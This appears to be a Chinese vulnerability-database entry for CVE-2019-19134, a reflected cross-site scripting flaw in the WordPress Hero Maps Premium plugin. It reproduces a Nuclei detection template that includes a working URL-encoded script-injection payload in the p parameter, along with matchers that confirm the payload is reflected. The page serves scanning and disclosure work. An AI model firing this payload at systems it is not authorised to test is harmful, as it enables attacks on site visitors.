CVE-2019-19134: WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress Hero Maps Premium | POC: 已公开

漏洞描述

WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.

PoC代码[已公开]

id: CVE-2019-19134

info:
  name: WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Update to the latest version of the WordPress Hero Maps Premium plugin (>=2.2.2) or apply the vendor-provided patch to fix the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
    - https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php
    - https://heroplugins.com/product/maps/
    - https://heroplugins.com/changelogs/hmaps/changelog.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2019-19134
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-19134
    cwe-id: CWE-79
    epss-score: 0.08631
    epss-percentile: 0.92104
    cpe: cpe:2.3:a:heroplugins:hero_maps_premium:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: heroplugins
    product: hero_maps_premium
    framework: wordpress
  tags: cve,cve2019,wpscan,wordpress,xss,wp-plugin,maps,heroplugins

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'foo"></script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a00463044022001048d9aeb289c0a4dc4372ff835b964cbd3218a5e0e5abb8a6ece46bb367f5e02200c50344b3e31c82e6369f3543d8a0d711c114473d6775a11d818a56190a9376a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐